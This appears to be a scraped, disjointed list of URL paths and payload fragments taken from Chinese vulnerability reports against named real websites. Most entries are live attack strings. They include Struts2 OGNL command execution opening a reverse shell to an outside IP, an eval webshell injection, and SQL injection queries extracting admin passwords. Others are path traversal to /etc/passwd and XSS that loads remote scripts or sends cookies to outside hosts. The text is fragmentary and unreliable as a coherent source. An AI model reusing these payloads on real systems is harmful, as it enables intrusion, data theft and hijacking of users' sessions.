/xxxxx/xxxx.xml /p/campus/job?postid=7190 /p/campus/job?postid=7190 /nap-front/register/register!checkFilePicture.action?fileId=13977200 /ajax/jQuery/jquery-1.7.2.min.js /utils/API-pack.js /sinaworm.html /sinaworm.html /sinaworm.html /bmiddle/7e7fc78bgw1ds88rpzhefj.jpg","http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg /hiwanz /index.php/201205hgktv/weibolottery/publish?callback= content[Math.round pic,atNum:1,filter:[],must:[],url:url},success,failure /group/editphoto.php?group_id=1507&photo_id=66772674 /rongwei/bk.php?id=12挺多库哈 /news/babyplan/info.php?id=19 /article.php?id=33500 /article.php /eSpace/beforelogin/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /eSpace/beforelogin/index.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) qrobot.qq.com/index.php/"%20class="red"%20style="Xss:expression(alert('xss')) /account/user/findPasswordInit.do?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%20自己的ip地址%208888%20%22%29%27%29%28\u0023rt%20\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /was40/zixun/xilan.jsp?id=3090 /lucky10/index.jsp?from=web2 /lucky10/index.jsp?from=%3CsCrIpt%3Ealert(/xss/)%3C/ScRipT%3E%22%3CsCr%3CscriPt%3EIpt%3Ealert(/xss/)%3C/Sc%3C/script%3ERipT%3E /cases/admin/undoLoginAction.do /speed/a20120410happy/SearchJiFenForiUin.php?iActivityId=61kkk%3Cscript%3Ealert%28/a/%29%3C/script%3E /search/xx%22%3E%3Cscript%3Ealert%28%27a%27%29 /ICBCDynamicSite/Charts/AccGold.aspx?dataType=0&dataId=903&picType=1 /search/noResult.php?qword=%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E /mac/mdata.php?id=../../../../../../../../../../etc/passwd%00.jpg /cgi-bin/sendagift /qzone/gift/CustomGiftViewer.swf /cgi-bin/sendagift?g_tk=399706077 giftid:67081 http://xsst.sinaapp.com/Xss.swf targetuin:48564615 /NewFile.txt /SelfServiceLogin.jsp /servicedetail.jsp?MONTHPAYID=1 /picview?b=idpic&filename=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.png /include/fckeditor/editor/filemanager/connectors/test.html /include/fckeditor/editor/filemanager/connectors/uploadtest.html /public/upload/tup.jpg/x.php /Order/VSNDetail.asp?ID=29 /subject/adodb/tests/test-datadict.php /tscms/index.php?a=article&aid=34 /index.php?do=view&id=44 /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /ztc/index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php/module/action/param1/$%7B@phpinfo()%7D /index.php?r=resume/edit / /techdown.tar /brand.php?brandid=1 /result.asp?sr=1 sgcc.com.cn /index.do /watch_only.php?id=461277 /news.php?id=32947 /register.php?svcid=%22%3E%3Cscript%3Ealert%288608012%29%3B%3C/script%3E&backurl=http://www.tom.com/index.html /register.php?svcid=47&backurl=%22%3E%3Cscript%3Ealert%282329710%29%3B%3C/script%3E /newweb/mp3/mp/ik/600902000001128716/douban.html /p/Searchcompany/industry?id=9&parent_id=1 /p/Searchcompany/industry?id=9&parent_id=1 /WebChatReg/deal/findphone.ashx?phone=13800138000&un=admin%27%20and%201=1-- /WebChatReg/deal/findphone.ashx?phone=13800138000&un=admin%27%20and%201=2-- /caipiao/usercenter.aspx /mensa/js_asp_gb_juankuan_pdp/index001juankuan.asp?formlink=12&liangbiao=PDP /mbti/submit_email_date.asp?user=315813 /spyware/s.asp?name=%B9%E3%B8%E6%B2%E5%BC%FELsmgr /submit/login_sendpass.php /info.jsp?magid=3004202 /authentication.do?appid=5060&busiUrl=http://www.wooyun.org /lushu/swf/.svn/entries /shouji/.svn/entries /lushu/swf/ /lushu/swf/upload.swf /1161579635#!app=2&pos=1338472616 /admin/login.jsp /System/ /tj/subscription /tbox#!javascript:alert(document.cookie) /tbox#!javascript:alert(document.cookie) /user.do?action=updateUserConfig /user.do?action=updateUserConfig expression /music.do?action=toShortUrl /song/1769227691 /tweet.do?action=addTweet /QJ5yOnj /song/1769227691 /music.do?action=toShortUrl /song/2068536 /QJ5yOnj /tweet.do?action=addTweet /QJ5yOnj /.svn/entries /.svn/entries /pic/.svn/entries /book/.svn/entries /music/.svn/entries /new/.svn/entries /sogou/map/.svn/entries /sogou/.svn/entries /detail.php?id=461553 /admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20order%20by%204%23 /admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=1%23 /admin/sdetail2.jsp?pID=oyfxxg&uID=rongyu0507%27%20and%201=2%23 /business/dooland/admin/index.mx /adclickrate/jsp/admin/generateTinyURL.jsp /search.do里。。。 /phpinfo.php /db/quanjude/ /framework_gb/Web/UI/ /help.php /1.php /1.txt /spaceinterface/ /log/ /aspnet_client/system_web/ /MyShareInfo/ /spaceinterface/xmlConfig/SSOConfig.xml /spaceinterface/xmlConfig/UDRouterServerConfig.xml /spaceinterface/xmlConfig/UmsApiConfig.xml /red/ldjc.php?class_id=66 /support/Channel_Home/ /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20@@version%3E1-- /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20user%3E0-- /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20host_name()=0-- /Downloads/Channel_Home/Download_Driver.asp?Content_ID=2967'%20and%20@@servername%3E0-- /m/index.php?c=post&m=index&id=2680 /spywars/login.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20perl%20\u002ftmp\u002fspider\u005fbc%20183.20.164.224%2012345%20%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /service/service_login.jsp?retUrl=%2Fwelcome%2FthirdPage.jsp /Recommend.php?editor=20 /bbs/list.php?bid=1 /recommend_product.php?category_id=5 / /loginBySystemAction.do?employeeId=C22606&key=sAAlbfHqQtY= /musicdoer/index.php/module/action/param1/$%7B@phpinfo()%7D /musicdoer/index.php/module/action/param1/${@eval%28$_POST[f]%29 /index.php/Count/index?id=16412 /recommend_product.php?category_id=6 /gainover#!javascript:alert(document.cookie) /{你的ID}/photos)打开调试工具,查看刚上传的图片。 /pid{我们的代码}.jpg /upload/photo xsst.sinaapp.com/m.js /2818517120/albums/detail/album_id/3452856527901069 /2818517120/photos/detail/photo_id/3452864928806857 / / /beijing/tabid/838/ctl/Admin/mid/1807/Default.aspx /positionDetail.shtml?id=111111111111111111111111 /favoman/Favoman/index?token=eaDnEdv6eOcxvVxIYG[马赛克]bmOXRTCl2RblsfEHRF5Yp7v4iXXJQ6ZrFhQ%3D%3D&vcode=05e5[马赛克]9c /widget?vid=1772503 /widget?vid=1764421页面的输出内容。 /create?tab=pic /widget?vid=1772503 //zf.xxx.com/(dqsrik2stu2ogv55amzxx5ua)/Default2.aspx。这个时候我将这个url发给别人,只要别人登录了,例如登录后:http://zf.scetop.com/(dqsrik2stu2ogv55amzxx5ua)/xs_main.aspx?xh=1001100111,我们访问这个地址,就可以绕过登录了。但是前提需要知道对方学好,将xh参数改成对方学号。所以危害比较小,只能作为一个漏洞示例。 /)存在注入点,好多,不止一个,随便找了个http://220.191.192.87/showNews!goSupportpage.action?showNewsDomain.newsid=209,可导出用户数据 /pub/FDI/zcfg/zcfg2/default.jsp?type=51 /pub/FDI_EN/Laws/default.jsp?type=530 /pub/FDI_EN/chunnel/tztdTwo.jsp?shengfen=2 /pub/FDI_EN/Laws/Laws2/default_anli.jsp?type=2706 /pub/FDI/zcfg/law_ch_info.jsp?docid=75041 /pub/FDI/chunnel/tztdTwo.jsp?shengfen= /pub/FDI/tzjh/gxjscpxmtj/gjdyth/default.jsp?type=3 /pub/FDI/tzjh/gxjscpxmtj/kjyhy/default.jsp?type=1 /pub/FDI/tzjh/gxjscpxmtj/rj/default.jsp?type=5 /pub/FDI/tzjh/gxjscpxmtj/xcl/default.jsp?type=7 /pub/FDI/tzjh/Page/lahuaNewInfo.jsp?id= /pub/FDI/wztj/wstztj/wstztjjs/default.jsp?key= /pub/FDI_EN/Opportunities/HightecProjectPromotion/GeospaceandOcean/default.jsp?type=1 /pub/FDI_EN/Opportunities/HightecProjectPromotion/Optical-ElectromechanicalIntegration/default.jsp?type=3 /pub/FDI_EN/Opportunities/HightecProjectPromotion/Software/default.jsp?type=5 /pub/FDI_EN/chunnel/Page/info.jsp?id=200802130040546 /pub/FDI/chunnel/Page/info_en.jsp?id=200802130040546 /pub/FDI/qycx/qycx_ch/infoResultNew.jsp Data1=12345678&Data2=12345678&Data3=12345678&Data4=12345678&txtCompName=12345678&SelCon=12345678&SelCompType=12345678&SelCompActuality=12345678&radiobutton=1 /blog/api/artpost.php /ads/index.asp /ads/ /ads/work/temp/ /manager/domain/cer.asp?domainid=346355 /manager/domain/cer.asp?domainid=346320 /showinfoservlet?id=1666 /yhdkjbxxsearchservlet?zgbh=62537968 /login.aspx /tasklist?wd=%22%20onmouseover=javascript:alert(document.cookie)%3E%BD%CC%D3%FD /tasklist?wd= /tasklist?wd=%22%3E%BD%CC%D3%FD%3Cscript%20src=http://tmxk.org/q.js%3E%3C/script%3E /books/33 /books/33 /books /2012/detail.php?fup=44&fid=48 /utsidakang/index.php?_c=utsidakang&_a=userAdd&type=login&callback=callba /gate/big5/miniactive.ifeng.com/huadi/index.php?_a=oneData&callback= /dayi/index.php?_a=oneData&callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /special/yingguodaxuan/data.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /poll.php?format=js&callback=pollback&surveyId=%3Cscript%3Ealert(/valo/)%3C/script%3E /stock/longhubang/gsdzz_ajax.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /rank_data.php?country=1&callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /info/testdrive.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /api/fashion_index_pms_api.php?callback=%3Cscript%3Ealert(/valo/)%3C/script%3E /CaiBeiConnect/forward.php?mall_id=10154&to_url=http://www.baidu.com /data/mail/show.php?id=11667 /data/mail/120/ /twns/login.jsf /upload/pop1.jsp /upload/images/temp/2012552131381371.jsp /upload/images/temp/2012552131381372.jsp http://www.zca.gov.cn/index.action /pic/6f81831bhc1b7f66073a7& /bmiddle/6f81831bhc1b7f66073a7 /pxrenren.js'" /pxrenren.js'" /pxrenren.js'" /pxrenren.js';document.body['appe'+'ndChild'](s)" /pxrenren.js';document.body['appe'+'ndChild'](window.s)" /pxrenren.js http://tiantiango.cn/download.action /gdqueyue/xml/config.xml /act/a20110323server/log/20120104.txt /toupiao/detail.php?id=54 //index.php/module/aciton/param1/${@phpinfo() /cesu/help_explain.php?id=27 /roll/20111231/081511108998.shtml /chanjing/cyxw/20120116/095711210900.shtml By:301 /blackberry/content.php?id=1 ?no= /Hot_Discuss.aspx?Name= /zjzx/?type=list&cq=%22%3E%3Cscript%3Ealert%280604795%29%3B%3C/script%3E /huodong/yspx/medal_team.php?id=326 /huodong/yspx/medal_team.php?id=326 /help_search.php?keyword=1&kindid=3 /test.php /admin/login.php /images/sohuhelp.gif/sohu.php,gif文件解析为php。 /help_3.php?kindid=%22/%3E%3Cscript%3Ealert%28/sohu/%29%3C/script%3E&pageno=2 /cgi-bin/nw/main.cgi?id=328 /cgi-bin/nw/main.cgi?id=328 /show.php?id=862 /game/yl/index.html?zixun.110.com /5107/upload/screenImagesSave.php?filename=jpg.php /xxx.php / / / /dedecms%E5%87%A0%E4%B8%AA%E6%9C%80%E6%96%B0bug%E5%88%86%E6%9E%90/ /app/Runtime/Logs/日期.log(如http://www.tgwok.com/app/Runtime/Logs/12_06_05.log)将有明文显示出涉密信息,导致敏感信息泄漏。出现此种情况的还有比比团团购网www.b1b8.com。 /sites/main/preview/ldgg_preview.htm?tid=50195 /看文章时,浏览器默认禁用javascript /md/pinglun.la.js /comment_box/plugin/get_comments?url=".urlencode / /md/pinglun.la.js /wp-content/plugins/pinglunla/readme.txt /wp-content/plugins/pinglunla/comments.php /wp-content/plugins/pinglunla/sinaweibo/ /wp-content/plugins/pinglunla/readme.txt /plugin/pinglunla.zip /所有评论都有xss。 /commentReply/comdetail?sid=314imc&commentid=82453 alert(document.cookie) /c/chat /notebook/jsb_exportData.php?&sort=1 http://web.im.baidu.com/message /flashgames/score.php?g=urn:uuid:a89bf012-ef00-30a1-8816-27eec49e5978&s=5 / /cgi-bin/club/login.cgi /cgi-bin/club/login.cgi /gq_free_detail.php?id=-340000 /index.php /的几处XSS alert(1),那么问题就来了。 alert(1) alert(1)。 web.qq.com /swf/FileUploader.swf) /swf/FileUploader.swf?callback= /swf/FileUploader.swf?callback= xsst.sinaapp.com/'%2bw%2b'.js' /webqqbg.php代码如下 /webqqbg.php.txt /webqqbg.php页面里的代码,会调用jq.js和wq.js /getvfqq.php?cookie="+encodeURIComponent(document.cookie) /getvfqq.php /webqqbg.php /getvfqq.php.txt /keycgi/qqweb/newuac/set.do /webqqbg.php /getvfqq.php /keycgi/qqweb/newuac/set.do发送主题数据 /webqqbg.php /cgi-bin/music/album/main.cgi?id=10227 /cgi-bin/music/album/main.cgi?id=10227 /tempuser1334906450?s=%22+onmouseover%3Djavascript%3Aalert%28document.cookie%29%3E / /passport/admin/member_detail.php?domain=5&id=823444 /passport/admin/member_detail.php?domain=5&id=500%20and%201=2%20UNION%20SELECT%20database(),user(),3,4,version(),6,7,8,9,10,11,12,13,14,15 /cgi-bin/column/content.cgi?main=2760&cat=2769&id=478354 /fckeditor/ /cgi-bin/team/main.cgi?id=26 /cgi-bin/team/main.cgi?id=26 absolute;left:10000px;top:10000px /exploits/18329/ /cgi-bin/subindex.cgi?id=259 www.jstzrcb.com site:focus.cn /vote/developer_intro.php?ID=1548 /vote/developer_intro.php?ID=90 /vote/developer_intro.php?ID=236 /vote/developer_intro.php?ID=59 /cgi-bin/nw/main.cgi?id=136 /cgi-bin/nw/main.cgi?id=104 /star/movie.php?id=2185 SELECT SELECT SELECT SELECT SELECT /star/movie.php?id=2185%201=2 SELECT SELECT SELECT SELECT SELECT SELECT /star/new.php?id=2976 SELECT /star/new.php?id=2976%20SELECT%20content%20FROM%20star_intro%20WHERE%20id=2971 /star/pic.php?id=540%E2%80%99 SELECT SELECT SELECT SELECT SELECT SELECT www.easybuy.com.cn www.icinfo.net.cn /yuejuan5/qq_gxqm?qm_num=3&content=%e5%b8%ae%e6%82%a8%e8%a7%a3%e5%86%b3%e4%b8%80%e5%88%87%e7%bd%91%e7%bb%9c%e9%97%ae%e9%a2%98%ef%bc%8c%e8%81%94%e7%b3%bb_%e7%ba%a2%e9%85%92%e7%8b%ac%e9%86%89+Qq_429590191+-+www.xjquc.com&isajax=1&_=1339136194456 /traffic/ /manage http://its.map.baidu.com:8002/admin /passport/admin/member_detail.php?domain=5&id=823444 /passport/admin/member_detail.php?domain=5&id=500%20and%201=2%20UNION%20SELECT%20database(),user(),3,4,version(),6,7,8,9,10,11,12,13,14,15 /WEB-INF/classes/ /WEB-INF/classes/dbConfig.properties120327 /preview?mid=1tbikRbGMUX9hA42zAAAs4&part=3&sign=f784871b12b1baf45a540659bacfeb99&time=1339077192&uid=zhuoran_li%40126.com /pub/weather/WeatherCity.aspx?FPY=D%3C/span%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E%3Cspan%3E&ModelName=Weather / /searchTech.php?so=magic%20ball%202%202.2&sidtech=0&ssidtech=0&cd=1&softId=0&p=37 /mwin/infomgt/publish/publishDetails!show.action /jseea_query/input.do?catlog=1&database=21%2Cdb_169 /member-0000001-modifyReceiver.html /member-0000002-modifyReceiver.html /download.jsp?path=UserFiles/File/%A1%B6%B8%A3%BD%A8%CA%A1%B9%AB%B0%B2%CC%FC%B9%D8%D3%DA%D3%A1%B7%A2%A1%B4%B8%A3%BD%A8%CA%A1%B9%AB%B0%B2%CC%FC%D5%FE%B8%AE%D0%C5%CF%A2%B9%AB%BF%AA%B9%A4%D7%F7%D4%DD%D0%D0%B9%E6%B6%A8%A1%B5%B5%C4%CD%A8%D6%AA%A1%B7%B5%C4%B8%BD%BC%FE20080530044951.doc /Description.action / /Manage/fckeditor/editor/filemanager/connectors/test.html /download.jsp?path=/UserFiles/File/20111118091214.doc /download.jsp?path=/UserFiles/../download.jsp /manager/html include include mm:ss /upload.do?realPath=/UserFiles/Image/&limit=0&hold=1 mm:ss /UserFiles/Image/shell.jsp(我选择上传的文件名是 /delMoreFile.do?realPath=/UserFiles/Image/&filename=shell.jsp¬Select=1 /admin/admin.jsp /accountForward.do?submitType=add /admin/admin.jsp /html/6/3/47864_201268428_1.html /templates/download.jsp?path=/UserFiles/File/20120529015133.zip /templates/download.jsp?path=/UserFiles/../WEB-INF/web.xml /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /templates/download.jsp?path=/UserFiles/../admin/template/uploadFile.jsp /uploadFile.do?realPath=/UserFiles/&limit=0&hold=1 /uploadFile.do?realPath=/UserFiles/test.jsp%00会怎样?当然希望是00截断了 /UserFiles/test.jsp(留下shell证明来过) / /?question/ajaxsearch/123%27union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19%20from%20ask_user%23%27% /robots.txt/1.php /news/view.php?id=8312 /web/topic/topic_content.php?id=435869 /web/topic/interface/publish.php?act=add /wangDian.html /wangDian.html /wangDian.html /index.php?classchg=&cnt=0&curpage=1&filterattr=4%7C6&filterstype=2%7C2&filtervalue=11%7C2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&orderby=F19%20desc&pagenum=20&site=digi&subcategory=%26%23191%3B%26%23213%3B%26%23181%3B%C2%A1%C3%82&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data /index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc /index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /events.php?do=view&id=162 /news.php?do=rel_view&id=5267 /news.php?do=rel_view&id=5267 / /WorkInfo.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa) /xiazai/front.php/software/software_c/index /xiazai/front.php/game/game_list_c/get_autocomplete_words?t=0.007178842930616547&s=qq /xiazai/front.php/game/game_list_c/show_index_now/53a 360.cn /upload.html /index.php?c=insert&a=doedit none"b=".rar|help_7f7b1b4ef061be3a.rar /bdpf/home/user/LosePWAction.do alert(/ie6/) url(http://tb1.bdstatic.com);xss:expression / /challenge/grouptab/loadlog?id=940 /challenge/grouptab/loadlog?id=940%20and%201=2%20union%20select%201,2,user%28%29,4,5,6,7,8,9,0,1,2,3-- /challenge/grouptab/loadlog?id=940%20and%201=2%20union%20select%201,2,3,load_file%280x2F6574632F706173737764%29,5,6,7,8,9,0,1,2,3-- /userinfo.php?id=554 /php/helper/ptool/hf_query/get_hf_info?gid=xxz&cid=74&area=102205&uin=1111%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /view/2f420bc258f5f61fb73666a8.html /images/jtsp.jsp?sort=-2&downfile=C:\Tomcat+5.0\webapps\tomcat-example\diydo.jsp /alibaba-message-Auth/alibabaAuth/alibabaloginAuthSession/login.html /--%3e%3cimg%20src%3dx%20Onerror%3dalert('wooyun')%3e /about/--%3e%3cimg%20src%3dx%20Onerror%3dalert('wooyun')%3e /list/--%3e%3cimg%20src%3dx%20Onerror%3dalert('wooyun')%3e /index.php?act=help.index&type=../../../../../../../../../../etc/passwd%00.jpg /guide/topics/data/data-storage.html#filesExternal /cgi-bin/team/show.cgi?id=521 /resin-doc/viewfile/?file=index.jsp alert write write write tmxk.org/q.js write /q.js write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62)) /index.php?app=home&mod=Public&act=tags_result&tag=%58%53%53%C2%A9%B6%B4%DF%E3%A3%BF //css/.svn/entries?COLLCC=1051966005& / /views/contents/common/download.jsp?filename=/upload/FileUploadback/HR_BULLETIN/20120120145058.doc / /net/bgxz/diy.asp /BeidaPass/login.jsp账号密码均为admin /manager/html /.svn/entries /.svn/text-base/bindPassport.php.svn-base www.hkstv.hk 1.9.2.28 write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62)) /chrome.html /.svn/entries /.buildpath /controller/.svn/entries /config/.svn/entries /.svn/text-base/index.php.svn-base /web/welcome/login?fromu=http%3A%2F%2Ftongji.baidu.com%2Fweb%2Foverview%2Findex&e=%D3%C3%BB%A7%3Cimg%20src=%221%22%20onerror=%22alert%28document.cookie%29%22%20/%3E%C3%FB%BB%F2%C3%DC%C2%EB%B4%ED%CE%F3&un=dddddd&aid=12&errno=132 /ddedu/website/index.jsp /recruitment/?id=2 / /ScoreReport.aspx?i=NTU1NQ== /ScoreReport.aspx?i=NTU1NQ== /.svn/text-base/admin.php.svn-base alert(document.cookie) /.svn/entries /.svn/text-base/group.php.svn-base /.svn/text-base/hotwords_report_thanks.jsp.svn-base /.svn/entries /.svn/entries /.svn/text-base/delete.php.svn-base /tclm/xxcx/wyzpbm.jsp?ucode=2145&&zpcode=151704 /detail.php?id=966 newsdisp.php?aid= /manager/status www.monternet.com hao.360.cn/i/index.html里存有该key,而hao.360.cn/i/index.html里存在着致命的一句 /iefix.php none swf app.baidu.com /static/12161058/appweb/flash/APPProxy.swf /static/12161058/appweb/flash/APPProxy.swf?logHandler= /rcookie.php?cookie%3d\'%2bencodeURIComponent(document.cookie);window.x=1 /static/12161058/appweb/flash/APPProxy.swf?logHandler= /rcookie.php?cookie%3d\'%2bencodeURIComponent(document.cookie)%2b\'%26refer%3d=\'%2bencodeURIComponent(location.href);window.x=1 /static/12161058/appweb/flash/APPProxy.swf?logHandler= /2011/0905/1315207969664.jpg/1.php /static/image/common/logo.png/1.php /continuum/workingCopy.action?projectId=221&projectName=&userDirectory=project&file=test.txt /continuum/buildResult.action?projectId=246&projectName=&buildId=22533&projectGroupId=0 /images/uploader.swf?jsobject=function%28%29{alert%280%29}%28%29 /web/welcome/ico?s=1,基于时间的注入。 /findpwd/setpwdfromemail?vc=c4ce4dd3d566ef83f9[马赛克]&u=[马赛克]%40gmail.com,马上重设密码! /resume_edu.php?eduid=144943 /resume_exp.php?expid=178735 /resume_training.php?id=59730 /user_action.php?_action=edu_del&id=144943 /user_action.php?_action=exp_del&id=178735 /user_action.php?_action=train_del&id=59730 /taobao-themes-bug/ /s?wd=xls%20%E8%BA%AB%E4%BB%BD%E8%AF%81%E5%8F%B7%203&pn=10&ie=utf-8&rsv_page=1 /s?ie=utf-8&bs=xls+%E5%8C%BB%E9%99%A2&f=8&rsv_bp=1&wd=xls+%E5%8C%BB%E9%99%A2+%E8%BA%AB%E4%BB%BD%E8%AF%81&inputT=2140 /Xjs.swf#.gif /tb/flash/vote.swf?r=166486139965bce7156bc36762bb2c3edf&voteId=0e1e9a0f95d922fc978c0adf&tn=ajaxCanVote&stamp=1339767810003 /tieba.htm)。 /tb/flash/vote.swf?r=166486139965bce7156bc36762bb2c3edf&voteId=0e1e9a0f95d922fc978c0adf&tn=ajaxCanVote&stamp=1339767810003 /vote/commit/add_vote?alt=json /dc/common/tbs?t=0.7085538243409246 /f/commit/vote/add /vote/commit/add_vote_relation?alt=json 100%;height:150px /vote/commit/add_vote?alt=json /Xjs.swf#1.gif /forum/pic/item/b9d3efb1c21a60589a50274f.jpg /forum/pic/item/b9d3efb1c21a60589a50274f.jpg /dc/common/tbs?t="+Math.random(),function(rs) /f/commit/vote/add /vote/commit/add_vote_relation?alt=json /newsecond/ /?mod=details&id=43167 /certificate.id/certificateb.php?id=20021329+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /certificate.id/certificateb.php?id=20021329+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28admin_u.name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60ectrust%60.admin_u+where+id%3D1+Order+by+name+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /certificate.id/certificateb.php?id=20021329+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28admin_u.password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60ectrust%60.admin_u+where+id%3D1+Order+by+name+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /certificate.id/certificateb.php?id=20021329 /file/downLoad?filename=../../WEB-INF/web.xml /download.jsp?path=download.jsp /supervision/test.asp /item/download.jsp?file_path=/item/file/%B9%A9%D3%A6%C9%CC%CC%E1%C7%B0%BD%E1%BF%EE%C9%EA%C7%EB%B1%ED.xls /Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN /Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN’ cs:558 /Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%String_Col%%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%20%271%27=%271 cs:558 /v/video_list.php?class=6%20and%201=2%20union%20select%201,2,3,4,5,6,7&channel= /userphoto.php?uid=194711 /newfriends.php?p=4 /sinamall/manager/merchant.upload.asp /sql.php / 80px relative;top:8px relative;top:4px relative;top:8px relative;top:4px /single_info/selectlogin_1.asp /single_info/selectdyy.asp?dyzh=D-1100-041848 /single_info/selectdyy.asp?dyzh=编号 /00/index_admin_01.asp?areaname=%20&areacode=00&page=2 /.svn/entries /.svn/text-base/restserver.php.svn-base /search/thread?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E /blog/ /Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175%09and%09sleep%2828100%29-- act.banggo.com/Ajax/adCodeInfo?adposid=1%09order%09by%098-- /admin/content/docmanage/download.jsp?filePath=/tongzhigonggao/CISSE/fujian.doc /custom/jqgt/GroupNewsList.aspx?GroupId=59 /custom/jqgt/GroupNewsList.aspx?GroupId=59 /jsp/document_downfile.jsp?filePath=C%3A%2FProgram%20Files%2FApache%20Software%20Foundation%2FTomcat%205.5%2Fwebapps%2Fcqrk%2Fcqrk_upload%2Fiteminfo%2F&fileName=%E8%AF%81%E4%B9%A6%E7%99%BB%E8%AE%B0%E6%B3%A8%E5%86%8C%E7%94%B3%E8%AF%B7%E8%A1%A8.doc&saveName=120-2011-12-15-09-34-12-1413.doc /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 /popup/popup.js?v=04241601 /get/file/content/old_image/fb64a79258fc6568f1cf28a02fbe84b0?from=page&rnd=16vq30dup&callback=bd__cbs__2hsm6v /get/file/content/old_image/fb64a79258fc6568f1cf28a02fbe84b0?from=page&rnd=16vq30dup /get/file/content/old_image/bcb94d83862402da4337a19a6b0c4cd6 